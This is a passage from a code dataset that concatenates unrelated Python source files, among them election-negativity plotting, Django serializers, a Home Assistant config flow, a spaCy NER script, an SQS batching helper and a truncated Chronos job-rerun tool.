pickle.load(data.joinpath('Individuals').joinpath(name2qid['Mike Pence'] + '_RDD.pickle').open('rb'))\n Clinton = pickle.load(data.joinpath('Individuals').joinpath(name2qid['Hillary Clinton'] + '_RDD.pickle').open('rb'))\n\n grid({'': Biden}, 1, 5, CORE_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False,\n ylabel='Pre-campaign z-scores', axs=axs[:, 0], prefix=string.ascii_lowercase, y_param=0.95)\n grid({'': Clinton}, 1, 5, CORE_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False,\n ylabel='Pre-campaign z-scores', axs=axs[:, 1], prefix=string.ascii_lowercase[5:], y_param=0.95)\n grid({'': Obama}, 1, 5, CORE_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False,\n ylabel='Pre-campaign z-scores', axs=axs[:, 2], prefix=string.ascii_lowercase[10:], y_param=0.95)\n grid({'': Pence}, 1, 5, CORE_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False,\n ylabel='Pre-campaign z-scores', axs=axs[:, 3], prefix=string.ascii_lowercase[15:], y_param=0.95)\n grid({'': Romney}, 1, 5, CORE_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False,\n ylabel='Pre-campaign z-scores', axs=axs[:, 4], prefix=string.ascii_lowercase[20:], y_param=0.95)\n grid({'': Trump}, 1, 5, CORE_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False,\n ylabel='Pre-campaign z-scores', axs=axs[:, 5], prefix=string.ascii_lowercase[25:] + string.ascii_uppercase, y_param=0.95)\n\n txt = ['Joe Biden', 'Hillary Clinton', 'Barack Obama', 'Mike Pence', 'Mitt Romney', 'Donald Trump']\n for i, row in enumerate(axs):\n for j, ax in enumerate(row):\n ax.set_ylim([-15, 35])\n if i == 0:\n ax.text(0.5, 1.24, txt[j], fontsize=FONTSIZE, fontweight='bold', va='center', ha='center',\n transform=ax.transAxes)\n if j != 0:\n ax.tick_params(axis='y', which='both', left=False, right=False)\n ax.tick_params(labelbottom=True)\n plt.setp(ax.get_xticklabels(), rotation=90, ha=\"left\")\n\n saveFigure(fig, SI.joinpath('Individuals_Grid.pdf'), excludeTightLayout=True)\n plt.close('all')\n\n # Party Empath controls + Republicans Without Trump\n print('Party, but with empath')\n democrats = pickle.load(data.joinpath('parties').joinpath('PartyAggregation_RDD_democrats.pickle').open('rb'))\n republicans = pickle.load(data.joinpath('parties').joinpath('PartyAggregation_RDD_republicans.pickle').open('rb'))\n wot = pickle.load(data.joinpath('PartyAggregationWithoutTrump_RDD_republicans.pickle').open('rb'))\n\n fig, axs = plt.subplots(ncols=7, nrows=3, figsize=[LANDSCAPE_FIGSIZE[0], LANDSCAPE_FIGSIZE[1] * .5], 
sharey='all')\n plt.subplots_adjust(wspace=.04, hspace=.55, bottom=.3)\n grid({'': democrats}, 7, 1, SI_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False,\n ylabel='Pre-campaign z-scores', axs=axs[0], prefix=string.ascii_uppercase)\n grid({'': republicans}, 7, 1, SI_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False,\n ylabel='Pre-campaign z-scores', axs=axs[1], prefix=string.ascii_lowercase[7:])\n grid({'': wot}, 7, 1, SI_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False,\n ylabel='Pre-campaign z-scores', axs=axs[2], prefix=string.ascii_lowercase[14:])\n\n txt = ['Democrats', 'Republicans', 'Republicans without Donald Trump']\n for i, row in enumerate(axs):\n for j, ax in enumerate(row):\n # ax.set_ylim([-5, 6])\n if j == 3:\n ax.text(0.5, 1.2, txt[i], fontsize=FONTSIZE, fontweight='bold', va='center', ha='center',\n transform=ax.transAxes)\n ax.tick_params(labelbottom=True)\n plt.setp(ax.get_xticklabels(), rotation=90, ha=\"left\")\n\n saveFigure(fig, SI.joinpath('Party_all'))\n\n\ndef main():\n args = parser.parse_args()\n data = Path(args.rdd)\n img = Path(args.img)\n\n # Map a file or folder name to a plotting utility.\n NAME_2_FUNCTION = {\n 'verbosity': verbosity_plots,\n 'parties': party_plots,\n 'YouGov_sources_RDD': basic_model_plots,\n 'Individuals': individuals,\n 'Without': ablation_plots,\n 'QuotationAggregation_RDD': basic_model_plots,\n 'QuotationAggregation_RDD_outliers': outlier_plots,\n 'SpeakerAggregation_RDD': basic_model_plots,\n 'SpeakerAggregationSanity_RDD': basic_model_plots,\n 'SpeakerAggregation_RDD_outliers': outlier_plots,\n 'AttributesAggregation_RDD': attribute_plots,\n 'AttributesAggregationSpeakerLevel_RDD': attribute_plots,\n 'RDD_time_variation': RDD_kink_performance,\n 'RDD_time_variation_YouGov': RDD_kink_performance,\n 'PartyAggregationWithoutTrump': basic_model_plots,\n 'PartyAggregationWithoutTrump_RDD_democrats': basic_model_plots,\n 'PartyAggregationWithoutTrump_RDD_republicans': basic_model_plots\n }\n\n paths = {\n 'QuotationAggregation_RDD': None,\n 'SpeakerAggregation_RDD': None,\n 'democrats': None,\n 'republicans': None\n }\n for path in data.iterdir():\n if path.name.endswith('tex'):\n continue\n\n if not path.name.startswith('YouGov') or path.name.startswith('QuotationAggregation'):\n continue\n\n base_name = path.name.split('.')[0]\n if base_name in paths:\n paths[base_name] = path\n elif base_name == 'parties':\n paths['democrats'] = path.joinpath('PartyAggregation_RDD_democrats.pickle')\n paths['republicans'] = path.joinpath('PartyAggregation_RDD_republicans.pickle')\n if base_name not in NAME_2_FUNCTION:\n continue\n\n print(base_name)\n base_folder = img.joinpath(base_name)\n plot = NAME_2_FUNCTION[base_name]\n plot(path, base_folder)\n\n if args.SI is not None:\n print('SI plots')\n si_data = Path(args.SI)\n si_img = img.joinpath('SI')\n si_img.mkdir(exist_ok=True)\n quant = si_data.joinpath('quantitative_statisticts.csv')\n plot_quantities(quant, si_img)\n SI_additionals(data, si_img)\n\n if all(p is not None for p in paths.values()):\n models = {key: pickle.load(paths[key].open('rb')) for key in paths}\n aggregation_overview(**models, folder=img)\n\n # Build \"Fig. 
0\"\n if 'QuotationAggregation_RDD' in paths:\n aggregates = data.parent.joinpath('aggregates')\n presidents = pd.read_csv(\n aggregates.joinpath('presidents.csv').open('r')) # Contains Obamas and Trumps number of Quotes\n negemo = pd.read_csv(aggregates.joinpath('QuotationAggregation.csv').open('r'))[['liwc_Negemo', 'date']]\n negemo['liwc_Negemo'] = negemo['liwc_Negemo'] \\\n * pickle.load(aggregates.joinpath('std.pickle').open('rb'))['liwc_Negemo'] \\\n + pickle.load(aggregates.joinpath('mean.pickle').open('rb'))[\n 'liwc_Negemo'] # Restore the original liwc scores\n title_figure(presidents, negemo, pickle.load(paths['QuotationAggregation_RDD'].open('rb')), img)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"epfl-dlab/Negativity_in_2016_campaign","sub_path":"analysis/figures.py","file_name":"figures.py","file_ext":"py","file_size_in_byte":67438,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"22011230970","text":"#!/usr/bin/python3\n\n\n\"\"\" Module to manage square draw\n>>> print_square(2)\n##\n##\n\"\"\"\n\n\ndef print_square(size):\n \"\"\" Print a square of side size\n size must be an integer\n if size is not integer TypeError will be raised\n if size > 0 , valuerror will be raised\n \"\"\"\n if not isinstance(size, int):\n raise TypeError(\"size must be an integer\")\n if size < 0:\n raise ValueError(\"size must be >= 0\")\n if size == 0:\n return\n print(\"\\n\" . join([\"\" . join([\n (\"#\" * size)\n ])] * size))\n","repo_name":"afissama/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/4-print_square.py","file_name":"4-print_square.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37009492744","text":"import types\nfrom array import array\nfrom mmap import mmap\nfrom pickle import PickleBuffer\nfrom types import UnionType\nfrom typing import TYPE_CHECKING, Any, Protocol, TypeVar, Union\nfrom typing import _AnnotatedAlias as TypingAnnotatedAlias # type: ignore\nfrom typing import _GenericAlias as TypingGenericAlias # type: ignore\nfrom typing import _LiteralGenericAlias as LiteralGenericAlias # type: ignore\nfrom typing import _UnionGenericAlias as UnionGenericAlias # type: ignore\nfrom typing import runtime_checkable\n\nif TYPE_CHECKING:\n from ctypes import _CData as CData # type: ignore\n\n\n__all__ = [\n \"AnnotatedAlias\",\n \"Dataclass\",\n \"Descriptor\",\n \"GenericAlias\",\n \"LiteralAlias\",\n \"ReadableBuffer\",\n \"SupportsTrunc\",\n \"UnionAlias\",\n]\n\n\nT_co = TypeVar(\"T_co\", covariant=True)\n\n\nclass SupportsTrunc(Protocol):\n def __trunc__(self) -> int:\n ...\n\n\n@runtime_checkable\nclass Descriptor(Protocol[T_co]):\n def __get__(self, instance: object, owner: type | None = ...) 
-> T_co:\n ...\n\n\nReadOnlyBuffer = bytes\n\n\nWritableBuffer = Union[bytearray, memoryview, \"array[Any]\", mmap, \"CData\", PickleBuffer]\n\n\nReadableBuffer = ReadOnlyBuffer | WritableBuffer\n\n\nDataclass = Any\n\n\nif TYPE_CHECKING:\n GenericAlias = Any\nelse:\n GenericAlias = TypingGenericAlias | types.GenericAlias\n\n\nif TYPE_CHECKING:\n UnionAlias = UnionType\nelse:\n UnionAlias = UnionGenericAlias | UnionType\n\n\nif TYPE_CHECKING:\n LiteralAlias = UnionType\nelse:\n LiteralAlias = LiteralGenericAlias\n\n\nif TYPE_CHECKING:\n AnnotatedAlias = UnionType\nelse:\n AnnotatedAlias = TypingAnnotatedAlias\n","repo_name":"LeeeeT/valtypes","sub_path":"valtypes/typing.py","file_name":"typing.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"70721443413","text":"from rest_framework import serializers\nfrom apps.products.models import *\nfrom apps.accounts.models import CustomUser\n\n\nclass ProductImagesSerializer(serializers.ModelSerializer):\n class Meta:\n model = ProductImages\n fields = ['id', 'images']\n\n\nclass ProductSerializer(serializers.ModelSerializer):\n color = serializers.StringRelatedField(many=True)\n size = serializers.StringRelatedField(many=True)\n product_images = ProductImagesSerializer(many=True, read_only=True)\n\n category = serializers.StringRelatedField(read_only=True)\n collection = serializers.StringRelatedField(read_only=True)\n\n class Meta:\n model = Product\n fields = ['id', 'collection', 'category',\n 'name', 'model', 'made_of_type',\n 'color', 'size', 'price', 'image',\n 'product_images', 'available_inventory',\n 'description'\n ]\n\n\nclass CategorySerializer(serializers.ModelSerializer):\n category_products = ProductSerializer(many=True)\n\n class Meta:\n model = Category\n fields = ['name', 'image', 'category_products']\n\n\nclass CollectionSerializer(serializers.ModelSerializer):\n collection_products = ProductSerializer(many=True, read_only=True)\n\n class Meta:\n model = Collection\n fields = ['title', 'collection_products']\n\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = CustomUser\n fields = ['username']\n\n\nclass CartItemSerializer(serializers.ModelSerializer):\n product = serializers.StringRelatedField(required=False)\n\n class Meta:\n model = CartItem\n fields = (\n 'id',\n 'product',\n 'quantity',\n 'get_total_price'\n )\n\n\nclass CartSerializer(serializers.ModelSerializer):\n items = CartItemSerializer(many=True)\n customer = UserSerializer(required=False, read_only=True)\n\n class Meta:\n model = Cart\n fields = (\n 'created_at', 'updated_at', 'items',\n 'get_cart_total_count', 'get_cart_total_price',\n 'calculated_total_discount', \"customer\"\n )\n\n\nclass OrderSerializer(serializers.ModelSerializer):\n customer = UserSerializer(read_only=True)\n\n class Meta:\n model = Order\n fields = (\n 'transaction_id', 'cart', 'customer',\n 'order_type', 'order_number',\n 'created_at', 'updated_at',\n )\n extra_kwargs = {\n 'transaction_id': {\"read_only\": True},\n 'cart': {\"required\": False},\n 'customer': {\"required\": False},\n }\n","repo_name":"ZBegzod/OnlineShopV2","sub_path":"apps/products/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"29361036888","text":"\"\"\"Adds config flow for BatteryNotes.\"\"\"\nfrom __future__ import annotations\n\nimport 
copy\nimport logging\n\nfrom typing import Any\n\nimport voluptuous as vol\nfrom homeassistant import config_entries\nfrom homeassistant.core import callback\nfrom homeassistant.data_entry_flow import FlowResult\nfrom homeassistant.config_entries import ConfigEntry, OptionsFlow\nfrom homeassistant.helpers import selector\nfrom homeassistant.helpers.typing import DiscoveryInfoType\n\nimport homeassistant.helpers.device_registry as dr\n\nfrom homeassistant.const import (\n CONF_NAME,\n CONF_DEVICE_ID,\n)\n\nfrom .library import Library\n\nfrom .const import (\n DOMAIN,\n CONF_BATTERY_TYPE,\n CONF_DEVICE_NAME,\n CONF_MANUFACTURER,\n CONF_MODEL,\n)\n\n_LOGGER = logging.getLogger(__name__)\n\nDEVICE_SCHEMA = vol.Schema(\n {\n vol.Required(CONF_DEVICE_ID): selector.DeviceSelector(\n # selector.DeviceSelectorConfig(model=\"otgw-nodo\")\n ),\n vol.Optional(CONF_NAME): selector.TextSelector(\n selector.TextSelectorConfig(type=selector.TextSelectorType.TEXT),\n ),\n }\n)\n\n\nclass BatteryNotesFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):\n \"\"\"Config flow for BatteryNotes.\"\"\"\n\n VERSION = 1\n\n data: dict\n\n @staticmethod\n @callback\n def async_get_options_flow(config_entry: ConfigEntry) -> OptionsFlow:\n \"\"\"Get the options flow for this handler.\"\"\"\n return OptionsFlowHandler(config_entry)\n\n async def async_step_integration_discovery(\n self,\n discovery_info: DiscoveryInfoType,\n ) -> FlowResult:\n \"\"\"Handle integration discovery.\"\"\"\n _LOGGER.debug(\"Starting discovery flow: %s\", discovery_info)\n\n self.context[\"title_placeholders\"] = {\n \"name\": discovery_info[CONF_DEVICE_NAME],\n \"manufacturer\": discovery_info[CONF_MANUFACTURER],\n \"model\": discovery_info[CONF_MODEL],\n }\n\n return await self.async_step_user(discovery_info)\n\n async def async_step_user(\n self,\n user_input: dict | None = None,\n ) -> config_entries.FlowResult:\n \"\"\"Handle a flow initialized by the user.\"\"\"\n _errors = {}\n if user_input is not None:\n self.data = user_input\n\n device_id = user_input[CONF_DEVICE_ID]\n\n device_registry = dr.async_get(self.hass)\n device_entry = device_registry.async_get(device_id)\n\n _LOGGER.debug(\n \"Looking up device %s %s\", device_entry.manufacturer, device_entry.model\n )\n\n library = Library.factory(self.hass)\n\n device_battery_details = await library.get_device_battery_details(\n device_entry.manufacturer, device_entry.model\n )\n\n if device_battery_details:\n _LOGGER.debug(\n \"Found device %s %s\", device_entry.manufacturer, device_entry.model\n )\n self.data[\n CONF_BATTERY_TYPE\n ] = device_battery_details.battery_type_and_quantity\n\n return await self.async_step_battery()\n\n return self.async_show_form(\n step_id=\"user\",\n data_schema=DEVICE_SCHEMA,\n errors=_errors,\n last_step=False,\n )\n\n async def async_step_battery(self, user_input: dict[str, Any] | None = None):\n \"\"\"Second step in config flow to add the battery type.\"\"\"\n errors: dict[str, str] = {}\n if user_input is not None:\n self.data[CONF_BATTERY_TYPE] = user_input[CONF_BATTERY_TYPE]\n\n device_id = self.data[CONF_DEVICE_ID]\n unique_id = f\"bn_{device_id}\"\n\n device_registry = dr.async_get(self.hass)\n device_entry = device_registry.async_get(device_id)\n\n await self.async_set_unique_id(unique_id)\n self._abort_if_unique_id_configured()\n\n if CONF_NAME in self.data:\n title = self.data.get(CONF_NAME)\n else:\n title = device_entry.name_by_user or device_entry.name\n\n return self.async_create_entry(\n title=title,\n data=self.data,\n )\n\n return 
self.async_show_form(\n step_id=\"battery\",\n data_schema=vol.Schema(\n {\n vol.Required(\n CONF_BATTERY_TYPE,\n default=self.data.get(CONF_BATTERY_TYPE),\n ): selector.TextSelector(\n selector.TextSelectorConfig(\n type=selector.TextSelectorType.TEXT\n ),\n ),\n }\n ),\n errors=errors,\n )\n\n\nclass OptionsFlowHandler(OptionsFlow):\n \"\"\"Handle an option flow for BatteryNotes.\"\"\"\n\n def __init__(self, config_entry: ConfigEntry) -> None:\n \"\"\"Initialize options flow.\"\"\"\n self.config_entry = config_entry\n self.current_config: dict = dict(config_entry.data)\n self.source_device_id: str = self.current_config.get(CONF_DEVICE_ID) # type: ignore\n self.name: str = self.current_config.get(CONF_NAME)\n self.battery_type: str = self.current_config.get(CONF_BATTERY_TYPE)\n\n async def async_step_init(\n self,\n user_input: dict[str, Any] | None = None,\n ) -> FlowResult:\n \"\"\"Handle options flow.\"\"\"\n errors = {}\n self.current_config = dict(self.config_entry.data)\n\n schema = self.build_options_schema()\n if user_input is not None:\n errors = await self.save_options(user_input, schema)\n if not errors:\n return self.async_create_entry(title=\"\", data={})\n\n return self.async_show_form(\n step_id=\"init\",\n data_schema=schema,\n errors=errors,\n )\n\n async def save_options(\n self,\n user_input: dict[str, Any],\n schema: vol.Schema,\n ) -> dict:\n \"\"\"Save options, and return errors when validation fails.\"\"\"\n device_registry = dr.async_get(self.hass)\n device_entry = device_registry.async_get(\n self.config_entry.data.get(CONF_DEVICE_ID)\n )\n\n if CONF_NAME in user_input:\n title = user_input.get(CONF_NAME)\n else:\n title = device_entry.name_by_user or device_entry.name\n\n self._process_user_input(user_input, schema)\n self.hass.config_entries.async_update_entry(\n self.config_entry,\n title=title,\n data=self.current_config,\n )\n return {}\n\n def _process_user_input(\n self,\n user_input: dict[str, Any],\n schema: vol.Schema,\n ) -> None:\n \"\"\"Process the provided user input against the schema.\"\"\"\n for key in schema.schema:\n if isinstance(key, vol.Marker):\n key = key.schema\n if key in user_input:\n self.current_config[key] = user_input.get(key)\n elif key in self.current_config:\n self.current_config.pop(key)\n\n def build_options_schema(self) -> vol.Schema:\n \"\"\"Build the options schema.\"\"\"\n data_schema = vol.Schema(\n {\n vol.Optional(CONF_NAME): selector.TextSelector(\n selector.TextSelectorConfig(type=selector.TextSelectorType.TEXT),\n ),\n vol.Required(CONF_BATTERY_TYPE): selector.TextSelector(\n selector.TextSelectorConfig(type=selector.TextSelectorType.TEXT),\n ),\n }\n )\n\n return _fill_schema_defaults(\n data_schema,\n self.current_config,\n )\n\n\ndef _fill_schema_defaults(\n data_schema: vol.Schema,\n options: dict[str, str],\n) -> vol.Schema:\n \"\"\"Make a copy of the schema with suggested values set to saved options.\"\"\"\n schema = {}\n for key, val in data_schema.schema.items():\n new_key = key\n if key in options and isinstance(key, vol.Marker):\n if (\n isinstance(key, vol.Optional)\n and callable(key.default)\n and key.default()\n ):\n new_key = vol.Optional(key.schema, default=options.get(key)) # type: ignore\n else:\n new_key = copy.copy(key)\n new_key.description = {\"suggested_value\": options.get(key)} # type: ignore\n schema[new_key] = val\n return 
vol.Schema(schema)\n","repo_name":"fwartner/homeassistant-config","sub_path":"custom_components/battery_notes/config_flow.py","file_name":"config_flow.py","file_ext":"py","file_size_in_byte":8503,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"67"} +{"seq_id":"8885771016","text":"import spacy\nfrom spacy import displacy\nfrom collections import Counter\nimport en_core_web_sm\nnlp = en_core_web_sm.load()\nfrom tqdm import tqdm \nimport json\nimport sys\nimport pandas as pd\n\n\ndef read_examples(input_file):\n \"\"\"Read contexts from a SQuAD-style json file and write up to six spaCy named entities per context to a CSV.\"\"\"\n with open(input_file, \"r\", encoding='utf-8') as reader:\n input_data = json.load(reader)[\"data\"]\n\n def is_whitespace(c):\n if c == \" \" or c == \"\\t\" or c == \"\\r\" or c == \"\\n\" or ord(c) == 0x202F:\n return True\n return False\n\n examples = []\n idx=0\n for _,entry in tqdm(enumerate(input_data)):\n for paragraph in entry[\"paragraphs\"]:\n context = paragraph[\"context\"]\n k=0\n for j in nlp(context).ents:\n idx+=1\n answer=j.text\n ner=j.label_\n examples.append(\n\n {\n 'context':context,\n 'answer':answer,\n 'id':idx,\n 'ner':ner,\n 'question':''\n }\n )\n k+=1\n if k>5:\n break\n \n \n df=pd.DataFrame(examples)\n df.to_csv('../output/'+sys.argv[1]+'_ner.csv')\n \n\nif __name__=='__main__':\n file_name=sys.argv[2]\n read_examples(file_name)","repo_name":"pritam004/GANMRC","sub_path":"source/get_ner_tags.py","file_name":"get_ner_tags.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"22642003308","text":"# read the file\nimport os\nimport csv\n# filepath\ncsvpath = os.path.join('Resources', 'election_data.csv')\ncandidate = []\nwith open(csvpath) as csvpoll:\n pollreader = csv.reader(csvpoll, delimiter=\",\")\n print(pollreader)\n # skip the header\n csvheader = next(pollreader)\n # creating a list for candidates --raw\n for row in pollreader:\n candidate.append(row[2])\n\n # First method to calculate the total number of votes\n totalvotes1 = len(candidate)\n print(f\"First way to calc total number of votes {totalvotes1}\")\n list1 = [\"Total Number of Votes\", (totalvotes1)]\n # Extract names of candidates as unique values\n unique = []\n # empty list for vote counts\n countvals = []\n # empty list for vote percentages\n percentvote = []\n countv = 0\n for vals in candidate:\n if vals not in unique:\n unique.append(vals)\n print(unique)\n # counting # of votes and percentages\n for uvals in unique:\n for vals in candidate:\n if uvals == vals:\n countv = countv+1\n countvals.append(countv)\n percent = countv/totalvotes1*100\n percentvote.append(percent)\n countv = 0\n print(countvals)\n print(percentvote)\n # counting who won: seed with the first count so any number of candidates works\n nextv = countvals[0]\n for i in countvals:\n if i >= nextv:\n maxv = i\n nextv = i\n print(maxv)\nwinner_name=unique[countvals.index(maxv)]\nwinner=[\"Winner of the election\",winner_name,maxv]\nprint(winner)\nfinalresult=zip(unique,countvals,percentvote)\n# printing in the output file\noutput_file = os.path.join(\"..\", \"output\", \"election_result.csv\")\nwith open(output_file, \"w\") as result:\n writer = csv.writer(result)\n title=[\"Election Result\"]\n writer.writerow(title)\n writer.writerow(list1)\n writer.writerow([\"Candidate\",\"Number of Votes\",\"Percent\"])\n writer.writerows(finalresult)\n writer.writerow(winner)\n \n\n\n\n \n \n\n\n \n 
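# Note: the winner scan above is equivalent to the built-in max(): maxv = max(countvals).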
\n","repo_name":"Arpi65/UCI_Homework_Arpi","sub_path":"python_challenge/PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73045627734","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport dask.dataframe as dd\nfrom dask.diagnostics import ProgressBar\nfrom matplotlib import pyplot as plt\nimport asyncio\n#from dask.distributed import Scheduler, Worker, Client\n\n#client = Client()\n\n\ndf = dd.read_csv('../data/nyc-parking-tickets/*filtered_2.csv')\n\n# Type conversions\n#df[\"Date.First.Observed\"] = pd.to_datetime(df[\"Date.First.Observed\"])\n#df[\"Vehichle.Expiration.Date\"] = pd.to_datetime(df[\"Vehicle.Expiration.Date\"])\n#df[\"NTA\"] = pd.to_object(df[\"NTA\"])\n\nprint(F\"Imported data types: {df.dtypes}\")\n\nprint(F\"Num Rows: {len(df.index)}\")\n\nmissing_values = df.isnull().sum()\nprint(F\"Missing values: {missing_values}\")\n\nmissing_count = ((missing_values / df.index.size) * 100)\nprint(F\"Missing count: {missing_count}\")\n\nwith ProgressBar():\n # This is now a Pandas Series object\n missing_count_pct = missing_count.compute()\nprint(F\"missing count pct {missing_count_pct}\")\n\ncolumns_to_drop = missing_count_pct [missing_count_pct > 60].index\nprint(F\"Columns to drop: {columns_to_drop}\")\nwith ProgressBar():\n df_dropped = df.drop(labels=columns_to_drop, axis=1)\n # df = df.set_index('timestamp')\n # client.persist(df_dropped)\nprint(F\"df_dropped = {df_dropped}\")\n\n\n\n","repo_name":"falenn/dask-tutorial","sub_path":"helloworld/helloworld.py","file_name":"helloworld.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14030318079","text":"import pygame\r\nimport sys\r\nfrom color import Color\r\nfrom player import Player\r\nfrom player import PlayerRed, PlayerBlu, Ball, BorderTop, BorderBottom\r\nfrom screen import Screen\r\n\r\n\r\npygame.init()\r\n# Player and Rect data\r\nredplayer = PlayerRed()\r\nbluplayer = PlayerBlu()\r\nball = Ball()\r\ntopborder = BorderTop()\r\nbottomborder = BorderBottom()\r\n\r\n# Screen data\r\nscreen = Screen()\r\n\r\n# The game itself\r\ngame_over = False\r\nwhile not game_over:\r\n for event in pygame.event.get():\r\n\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n\r\n redplayer.player_movement_input(event)\r\n bluplayer.player_movement_input(event)\r\n\r\n redplayer.update_movement()\r\n bluplayer.update_movement()\r\n ball.update_movement(redplayer, bluplayer, topborder, bottomborder, screen)\r\n\r\n screen.update_screen(redplayer, bluplayer, ball, topborder, bottomborder)\r\n pygame.display.update()\r\n","repo_name":"Chatchai222/StunningSalt","sub_path":"testing code.py","file_name":"testing code.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1713397196","text":"import os\nfrom reactivex import Observable, operators as ops\nfrom aws_lambda_powertools import Logger\nfrom aws_lambda_stream.connectors.sqs import Connector\nfrom aws_lambda_stream.utils.operators import split_buffer\nfrom .batch import to_batch_uow, unbatch_uow\n\n\ndef send_to_sqs(\n logger=Logger(),\n queue_url = os.getenv('QUEUE_URL'),\n message_field = 'message',\n batch_size=os.getenv('SQS_BATCH_SIZE') or os.getenv('BATCH_SIZE') or 10\n ):\n connector = Connector(queue_url)\n\n def 
to_input_params(batch_uow):\n return {\n **batch_uow,\n 'input_params': {\n 'Entries': list(map(\n lambda uow: uow[message_field],\n filter(\n lambda uow: message_field in uow,\n batch_uow['batch']\n )\n ))\n }\n }\n\n def send_message_batch(batch_uow):\n if len(batch_uow['input_params']['Entries']) == 0:\n return batch_uow\n logger.info(batch_uow['input_params'])\n return {\n **batch_uow,\n 'send_message_batch_response': connector.send_message_batch(\n batch_uow['input_params']\n )\n }\n\n def wrapper(source: Observable):\n return source.pipe(\n ops.buffer_with_count(batch_size, batch_size),\n ops.map(to_batch_uow),\n ops.map(to_input_params),\n ops.map(send_message_batch),\n ops.map(unbatch_uow),\n split_buffer()\n )\n return wrapper\n","repo_name":"clandro89/aws-lambda-stream","sub_path":"aws_lambda_stream/utils/sqs.py","file_name":"sqs.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"10913920731","text":"import argparse\nimport copy\nimport datetime\n\nfrom paasta_tools import chronos_tools\nfrom paasta_tools.utils import load_system_paasta_config\nfrom paasta_tools.utils import NoConfigurationForServiceError\nfrom paasta_tools.utils import NoDeploymentsAvailable\nfrom paasta_tools.utils import NoDockerImageError\nfrom paasta_tools.utils import paasta_print\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='',\n )\n parser.add_argument(\n '-v', '--verbose', action='store_true', dest=\"verbose\", default=False,\n help=\"Print out more output regarding the state of the service\",\n )\n parser.add_argument(\n '-d', '--soa-dir', dest=\"soa_dir\", metavar=\"SOA_DIR\",\n default=chronos_tools.DEFAULT_SOA_DIR,\n help=\"define a different soa config directory\",\n )\n parser.add_argument(\n '-a', '--run-all-related-jobs', action='store_true', dest='run_all_related_jobs',\n default=False, help='Run all the parent-dependent related jobs',\n )\n parser.add_argument(\n '-f', '--force-disabled', action='store_true', dest='force_disabled',\n default=False, help='Run services that are configured to be disabled',\n )\n parser.add_argument('service_instance', help='Instance to operate on. Eg: example_service.main')\n parser.add_argument(\n 'execution_date',\n help=\"The date the job should be rerun for. 
Expected in the format %%Y-%%m-%%dT%%H:%%M:%%S .\",\n )\n args = parser.parse_args()\n return args\n\n\ndef modify_command_for_date(chronos_job, date, verbose):\n \"\"\"\n Given a chronos job config, return a cloned job config where the command\n has been modified to reflect what it would have run as on\n a given date.\n\n :param chronos_job: a chronos job dictionary, as created by\n ``chronos_tools.create_complete_config``\n :param date: a ``datetime.datetime`` object.\n :returns chronos_job: a chronos_job dict with the command modified to\n interpolate in the context of the date provided.\n \"\"\"\n current_command = chronos_job['command']\n if current_command is not None:\n chronos_job['command'] = chronos_tools.parse_time_variables(\n command=current_command,\n parse_time=date,\n )\n else:\n if verbose:\n job_name = \".\".join(chronos_tools.decompose_job_id(chronos_job['name']))\n paasta_print(f'command in job {job_name} is empty - skipping formatting and depending on command in image')\n return chronos_job\n\n\ndef set_default_schedule(chronos_job):\n \"\"\"\n Given a chronos job, return a new job identical to the first, but with the\n schedule replaced with one that will set the job to run now.\n\n :param chronos_job: a chronos job dictionary suitable for POSTing to\n Chronos\n :returns: the chronos_job parameter, with the 'schedule' field modified to\n a schedule for chronos to run the job now and only once. The interval field\n of the schedule is irrelevant, but required by Chronos.\n \"\"\"\n chronos_job['schedule'] = 'R1//PT1M'\n return chronos_job\n\n\ndef get_tmp_naming_scheme_prefix(timestamp=None):\n timestamp = timestamp if timestamp else datetime.datetime.utcnow().isoformat()\n timestamp = timestamp.replace(':', '')\n timestamp = timestamp.replace('.', '')\n\n return '{}-{}'.format(\n chronos_tools.TMP_JOB_IDENTIFIER,\n timestamp,\n )\n\n\ndef set_tmp_naming_scheme(chronos_job, timestamp=None):\n \"\"\"\n Given a chronos job, return a new job identical to the first, but with the\n name set to one which makes it identifiable as a temporary job.\n\n :param chronos_job: a chronos job suitable for POSTing to Chronos\n :param timestamp: timestamp to use for the generation of the tmp job name\n :returns: the chronos_job parameter, with the name of the job modified to\n allow it 